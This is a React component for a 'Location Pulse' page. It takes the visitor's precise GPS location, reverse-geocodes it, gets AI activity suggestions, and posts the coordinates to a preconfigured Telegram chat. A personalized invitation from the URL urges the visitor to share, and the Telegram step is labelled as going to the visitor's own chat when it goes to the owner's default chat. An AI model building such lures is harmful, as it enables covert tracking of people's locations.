import React, { useState } from 'react';
import { MapPin, Send, Mic, Loader2, CheckCircle, AlertCircle, ChevronRight, Copy, Brain, Wifi } from 'lucide-react';

interface LocationData {
  latitude: number;
  longitude: number;
  accuracy: number;
  timestamp: number;
}

interface StepStatus {
  status: 'idle' | 'loading' | 'success' | 'error';
  data?: any;
  error?: string;
}

export default function LocationPulseDiagnostic() {
  const [steps, setSteps] = useState<{
    location: StepStatus;
    geocoding: StepStatus;
    aiProcessing: StepStatus;
    telegramSend: StepStatus;
  }>({
    location: { status: 'idle' },
    geocoding: { status: 'idle' },
    aiProcessing: { status: 'idle' },
    telegramSend: { status: 'idle' }
  });

  const [showJson, setShowJson] = useState<string | null>(null);
  const [defaultChatId, setDefaultChatId] = useState<string | null>(null);
  
  // Get URL parameters
  const urlParams = new URLSearchParams(window.location.search);
  const senderName = urlParams.get('name');
  const personalMessage = urlParams.get('msg');

  // Load default chat ID on mount
  React.useEffect(() => {
    fetch('https://biig-api.b-9f2.workers.dev/api/telegram/chat-ids')
      .then(res => res.json())
      .then(data => {
        if (data.success && data.chatIds) {
          const defaultChat = data.chatIds.find((c: any) => c.isDefault);
          if (defaultChat) {
            setDefaultChatId(defaultChat.chatId);
          }
        }
      })
      .catch(console.error);
  }, []);

  const updateStep = (step: string, update: StepStatus) => {
    setSteps(prev => ({ ...prev, [step]: update }));
  };

  const startLocationPulse = async () => {
    // Reset all steps
    setSteps({
      location: { status: 'idle' },
      geocoding: { status: 'idle' },
      aiProcessing: { status: 'idle' },
      telegramSend: { status: 'idle' }
    });

    try {
      // Step 1: Get Location
      updateStep('location', { status: 'loading' });
      
      const position = await new Promise<GeolocationPosition>((resolve, reject) => {
        if (!navigator.geolocation) {
          reject(new Error('Geolocation not supported'));
          return;
        }

        navigator.geolocation.getCurrentPosition(resolve, reject, {
          enableHighAccuracy: true,
          timeout: 10000,
          maximumAge: 0
        });
      });

      const locationData: LocationData = {
        latitude: position.coords.latitude,
        longitude: position.coords.longitude,
        accuracy: position.coords.accuracy,
        timestamp: Date.now()
      };

      updateStep('location', { status: 'success', data: locationData });
      await new Promise(resolve => setTimeout(resolve, 500)); // Visual delay

      // Step 2: Reverse Geocoding
      updateStep('geocoding', { status: 'loading' });
      
      const geocodeResponse = await fetch(
        `https://nominatim.openstreetmap.org/reverse?lat=${locationData.latitude}&lon=${locationData.longitude}&format=json`,
        { headers: { 'User-Agent': 'LocationPulseDiagnostic/1.0' } }
      );
      
      const geocodeData = await geocodeResponse.json();
      updateStep('geocoding', { status: 'success', data: geocodeData });
      await new Promise(resolve => setTimeout(resolve, 500));

      // Step 3: AI Processing
      updateStep('aiProcessing', { status: 'loading' });
      
      // Determine time of day and day of week for contextual suggestions
      const now = new Date();
      const hour = now.getHours();
      const dayOfWeek = now.toLocaleDateString('en-US', { weekday: 'long' });
      const timeOfDay = hour < 12 ? 'morning' : hour < 17 ? 'afternoon' : 'evening';
      
      const aiPayload = {
        location: locationData,
        geocode: geocodeData,
        prompt: `Location: ${geocodeData.display_name || 'Unknown'}
Time: ${dayOfWeek} ${timeOfDay}

List exactly 3 activities to do RIGHT NOW in this area:

1. [First activity - include specific place name and address if possible]
2. [Second activity - include specific place name and address if possible]  
3. [Third activity - include specific place name and address if possible]

Keep each activity to 1-2 sentences. Be specific and actionable.`
      };

      const aiResponse = await fetch('https://biig-api.b-9f2.workers.dev/api/location/ai-summary', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(aiPayload)
      });

      const aiData = await aiResponse.json();
      updateStep('aiProcessing', { status: 'success', data: aiData });
      await new Promise(resolve => setTimeout(resolve, 500));

      // Step 4: Send to Telegram
      updateStep('telegramSend', { status: 'loading' });
      
      const telegramPayload = {
        location: locationData,
        geocode: geocodeData,
        summary: {
          ...((aiData.summary || {
            text: `Location: ${geocodeData.display_name || 'Your location'}`,
            facts: [
              `Coordinates: ${locationData.latitude.toFixed(6)}, ${locationData.longitude.toFixed(6)}`,
              `Accuracy: ±${Math.round(locationData.accuracy)}m`,
              `Time: ${new Date().toLocaleString()}`
            ]
          })),
          senderName,
          personalMessage
        }
      };

      const telegramResponse = await fetch('https://biig-api.b-9f2.workers.dev/api/location/telegram/location-pulse', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(telegramPayload)
      });

      const telegramResult = await telegramResponse.json();
      
      if (telegramResponse.ok) {
        updateStep('telegramSend', { status: 'success', data: telegramResult });
      } else {
        updateStep('telegramSend', { status: 'error', error: telegramResult.error || 'Failed to send' });
      }
    } catch (error) {
      const errorMessage = error instanceof Error ? error.message : 'Unknown error';
      
      // Update the current step with error
      if (steps.location.status === 'loading') {
        updateStep('location', { status: 'error', error: errorMessage });
      } else if (steps.geocoding.status === 'loading') {
        updateStep('geocoding', { status: 'error', error: errorMessage });
      } else if (steps.aiProcessing.status === 'loading') {
        updateStep('aiProcessing', { status: 'error', error: errorMessage });
      } else if (steps.telegramSend.status === 'loading') {
        updateStep('telegramSend', { status: 'error', error: errorMessage });
      }
    }
  };

  const copyJson = (data: any) => {
    navigator.clipboard.writeText(JSON.stringify(data, null, 2));
  };

  const getStepIcon = (step: StepStatus) => {
    switch (step.status) {
      case 'loading':
        return <Loader2 className="w-5 h-5 animate-spin text-blue-500" />;
      case 'success':
        return <CheckCircle className="w-5 h-5 text-green-500" />;
      case 'error':
        return <AlertCircle className="w-5 h-5 text-red-500" />;
      default:
        return <div className="w-5 h-5 rounded-full border-2 border-gray-300" />;
    }
  };

  const stepDetails = [
    {
      key: 'location',
      title: '📍 Get GPS Location',
      description: 'Requesting device location from browser',
      icon: MapPin
    },
    {
      key: 'geocoding',
      title: '🗺️ Reverse Geocoding',
      description: 'Converting coordinates to place names',
      icon: MapPin
    },
    {
      key: 'aiProcessing',
      title: '🤖 AI Processing',
      description: 'Generating intelligent location insights',
      icon: Brain
    },
    {
      key: 'telegramSend',
      title: '✈️ Send to Telegram',
      description: 'Delivering to your Telegram chat',
      icon: Send
    }
  ];

  return (
    <div className="min-h-screen bg-gradient-to-br from-gray-900 via-blue-900 to-purple-900 p-6">
      <div className="max-w-4xl mx-auto">
        {/* Header */}
        <div className="text-center mb-8">
          <h1 className="text-4xl font-bold text-white mb-2">Location Pulse Diagnostic</h1>
          <p className="text-blue-200">See every step of the process in real-time</p>
        </div>

        {/* Personalized Greeting */}
        {(senderName || personalMessage) && (
          <div className="mb-6 bg-gradient-to-r from-purple-800/50 to-blue-800/50 backdrop-blur rounded-xl p-6 border border-purple-500/30">
            <div className="text-center">
              {senderName && (
                <h2 className="text-2xl font-bold text-white mb-2">
                  👋 Hey there! {senderName} wants you to test this
                </h2>
              )}
              {personalMessage && (
                <p className="text-lg text-purple-200 italic">
                  "{personalMessage}"
                </p>
              )}
              <p className="text-sm text-blue-300 mt-3">
                Click the button below to share your location and see the magic happen! 🚀
              </p>
            </div>
          </div>
        )}

        {/* Configuration Status */}
        <div className="mb-6 bg-gray-800/50 backdrop-blur rounded-xl p-4 border border-gray-700">
          <div className="flex items-center justify-between">
            <div className="flex items-center gap-3">
              <div className={`w-3 h-3 rounded-full ${defaultChatId ? 'bg-green-500 animate-pulse' : 'bg-red-500'}`} />
              <span className="text-sm text-gray-400">Default Chat ID:</span>
              {defaultChatId ? (
                <code className="bg-gray-900/50 text-green-400 px-2 py-1 rounded text-sm font-mono">
                  {defaultChatId}
                </code>
              ) : (
                <span className="text-red-400 text-sm">Not configured</span>
              )}
            </div>
            {!defaultChatId && (
              <a 
                href="/telegram-business" 
                className="text-xs bg-blue-500/20 text-blue-400 px-3 py-1 rounded-full hover:bg-blue-500/30 transition-colors"
              >
                Configure in Settings →
              </a>
            )}
          </div>
        </div>

        {/* Start Button */}
        <div className="text-center mb-8">
          <button
            onClick={startLocationPulse}
            className="px-8 py-4 bg-gradient-to-r from-blue-500 to-purple-600 text-white font-bold rounded-xl hover:from-blue-600 hover:to-purple-700 transform hover:scale-105 transition-all duration-200 shadow-xl"
          >
            🚀 Start Location Pulse
          </button>
        </div>

        {/* Process Steps */}
        <div className="space-y-4">
          {stepDetails.map((detail, index) => {
            const step = steps[detail.key as keyof typeof steps];
            const isActive = step.status !== 'idle';
            
            return (
              <div
                key={detail.key}
                className={`bg-gray-800/50 backdrop-blur rounded-xl p-6 border transition-all duration-300 ${
                  isActive ? 'border-blue-500 shadow-xl' : 'border-gray-700'
                }`}
              >
                <div className="flex items-start gap-4">
                  {/* Status Icon */}
                  <div className="flex-shrink-0 mt-1">
                    {getStepIcon(step)}
                  </div>

                  {/* Content */}
                  <div className="flex-1">
                    <h3 className="text-lg font-semibold text-white flex items-center gap-2">
                      {detail.title}
                      {step.status === 'loading' && (
                        <span className="text-xs bg-blue-500/20 text-blue-300 px-2 py-1 rounded-full">
                          Processing...
                        </span>
                      )}
                    </h3>
                    <p className="text-gray-400 text-sm mt-1">{detail.description}</p>

                    {/* Data Display */}
                    {step.data && (
                      <div className="mt-4">
                        <div className="flex items-center gap-2 mb-2">
                          <span className="text-xs text-gray-500">Response Data:</span>
                          <button
                            onClick={() => setShowJson(showJson === detail.key ? null : detail.key)}
                            className="text-xs bg-gray-700 hover:bg-gray-600 text-gray-300 px-2 py-1 rounded transition-colors"
                          >
                            {showJson === detail.key ? 'Hide' : 'Show'} JSON
                          </button>
                          <button
                            onClick={() => copyJson(step.data)}
                            className="text-xs bg-gray-700 hover:bg-gray-600 text-gray-300 px-2 py-1 rounded transition-colors flex items-center gap-1"
                          >
                            <Copy className="w-3 h-3" />
                            Copy
                          </button>
                        </div>

                        {showJson === detail.key && (
                          <pre className="bg-gray-900/50 text-green-400 p-4 rounded-lg text-xs overflow-x-auto max-h-64 overflow-y-auto">
                            {JSON.stringify(step.data, null, 2)}
                          </pre>
                        )}

                        {/* Quick Preview */}
                        {!showJson && (
                          <div className="bg-gray-900/30 p-3 rounded-lg">
                            {detail.key === 'location' && step.data && (
                              <div className="text-sm text-gray-300">
                                📍 {step.data.latitude.toFixed(6)}, {step.data.longitude.toFixed(6)}
                                <br />⚡ Accuracy: ±{Math.round(step.data.accuracy)}m
                              </div>
                            )}
                            {detail.key === 'geocoding' && step.data && (
                              <div className="text-sm text-gray-300">
                                📍 {step.data.display_name || 'Location found'}
                              </div>
                            )}
                            {detail.key === 'aiProcessing' && step.data && (
                              <div className="text-sm text-gray-300 whitespace-pre-wrap">
                                ✨ {step.data.summary?.text || step.data.raw || 'AI summary generated'}
                                {step.data.summary?.facts && (
                                  <div className="mt-2 text-xs">
                                    {step.data.summary.facts.map((fact: string, i: number) => (
                                      <div key={i}>• {fact}</div>
                                    ))}
                                  </div>
                                )}
                              </div>
                            )}
                            {detail.key === 'telegramSend' && step.data && (
                              <div className="text-sm text-gray-300 space-y-1">
                                <div>✅ {step.data.message || 'Sent successfully'}</div>
                                {step.data.diagnosticId && (
                                  <div className="text-xs text-blue-400">
                                    🆔 Pulse ID: <code className="bg-gray-800 px-1 rounded">{step.data.diagnosticId}</code>
                                  </div>
                                )}
                                {step.data.chatId && (
                                  <div className="text-xs text-green-400">
                                    👤 Sent to Chat ID: <code className="bg-gray-800 px-1 rounded">{step.data.chatId}</code>
                                  </div>
                                )}
                                {step.data.messageId && (
                                  <div className="text-xs text-purple-400">
                                    💬 Message ID: <code className="bg-gray-800 px-1 rounded">{step.data.messageId}</code>
                                  </div>
                                )}
                                {step.data.details && (
                                  <div className="text-xs text-gray-400 mt-2">
                                    📝 Text: {step.data.details.textSent ? '✅' : '❌'}
                                    {' | '}
                                    📍 Location: {step.data.details.locationSent ? '✅' : '❌'}
                                  </div>
                                )}
                              </div>
                            )}
                          </div>
                        )}
                      </div>
                    )}

                    {/* Error Display */}
                    {step.status === 'error' && (
                      <div className="mt-4 bg-red-500/10 border border-red-500/30 rounded-lg p-3">
                        <p className="text-red-400 text-sm">{step.error}</p>
                      </div>
                    )}
                  </div>

                  {/* Step Number */}
                  <div className="flex-shrink-0">
                    <span className="text-2xl font-bold text-gray-600">
                      {String(index + 1).padStart(2, '0')}
                    </span>
                  </div>
                </div>
              </div>
            );
          })}
        </div>

        {/* API Info */}
        <div className="mt-8 bg-gray-800/50 backdrop-blur rounded-xl p-6 border border-gray-700">
          <h3 className="text-lg font-semibold text-white mb-4">🔧 API Configuration</h3>
          <div className="space-y-2 text-sm">
            <div className="flex items-center gap-2">
              <Wifi className="w-4 h-4 text-green-400" />
              <span className="text-gray-400">API Base:</span>
              <code className="text-blue-400">https://biig-api.b-9f2.workers.dev</code>
            </div>
            <div className="flex items-center gap-2">
              <Brain className="w-4 h-4 text-purple-400" />
              <span className="text-gray-400">AI Provider:</span>
              <code className="text-blue-400">Cloudflare Workers AI</code>
            </div>
            <div className="flex items-center gap-2">
              <Send className="w-4 h-4 text-blue-400" />
              <span className="text-gray-400">Telegram Bot:</span>
              <code className="text-blue-400">@BiigDevBot</code>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}